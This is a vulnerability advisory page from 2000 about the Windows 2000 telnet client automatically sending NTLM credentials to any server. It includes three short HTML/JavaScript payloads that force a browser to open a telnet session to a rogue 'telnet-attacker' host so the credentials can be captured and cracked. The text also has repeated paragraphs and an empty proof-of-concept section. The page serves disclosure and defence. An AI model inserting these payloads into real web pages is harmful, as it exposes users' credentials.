Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability
BID:1683
Info
Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability
| Bugtraq ID: | 1683 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Sep 14 2000 12:00AM |
| Updated: | Sep 14 2000 12:00AM |
| Credit: | Discovered by DilDog <[email protected]> and publicized in an @Stake Security Advisory (A091400-1) on September 14, 2000. Additional information provided by Monti <[email protected]>. |
| Vulnerable: |
Microsoft Windows 2000 Server SP1 Microsoft Windows 2000 Server Microsoft Windows 2000 Professional SP1 Microsoft Windows 2000 Professional Microsoft Windows 2000 Advanced Server SP1 Microsoft Windows 2000 Advanced Server |
| Not Vulnerable: | |
Discussion
Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability
By default, the telnet client (telnet.exe) shipped with Microsoft Windows 2000 utilizes Windows NT Challenge/Response (NTLM) as an authentication method. When establishing a connection to a host, the telnet client will attempt authentication via NTLM, regardless of whether or not the host is a Windows telnet server or not. There is a possibility that the NTLM challenge/response authentication session could be monitored and subsequently cracked, which could lead to the disclosure of sensitive information such as usernames, passwords, domains, etc. The NTLM challenge/response protocol is known to be susceptible to brute-force cracking, as demonstrated in the tool "L0phtcrack."
Forcing a telnet session on a remote target is a trivial task because products such as Microsoft Internet Explorer, Outlook (Express), Netscape Navigator, etc. will automatically open URLs with a "telnet://" prefix in a default telnet client (which is normally telnet.exe). The following are some examples of how one could open a telnet session on a specified rogue server:
1) frame src=telnet://target
2) meta http-equiv="refresh" content="0;URL=telnet://telnet-attacker"
3) window.open("telnet://target")
By default, the telnet client (telnet.exe) shipped with Microsoft Windows 2000 utilizes Windows NT Challenge/Response (NTLM) as an authentication method. When establishing a connection to a host, the telnet client will attempt authentication via NTLM, regardless of whether or not the host is a Windows telnet server or not. There is a possibility that the NTLM challenge/response authentication session could be monitored and subsequently cracked, which could lead to the disclosure of sensitive information such as usernames, passwords, domains, etc. The NTLM challenge/response protocol is known to be susceptible to brute-force cracking, as demonstrated in the tool "L0phtcrack."
Forcing a telnet session on a remote target is a trivial task because products such as Microsoft Internet Explorer, Outlook (Express), Netscape Navigator, etc. will automatically open URLs with a "telnet://" prefix in a default telnet client (which is normally telnet.exe). The following are some examples of how one could open a telnet session on a specified rogue server:
1) frame src=telnet://target
2) meta http-equiv="refresh" content="0;URL=telnet://telnet-attacker"
3) window.open("telnet://target")
Exploit / POC
Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability
DilDog <[email protected]> has released the following proof-of-concept code:
DilDog <[email protected]> has released the following proof-of-concept code:
Solution / Fix
References
Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability
References:
References: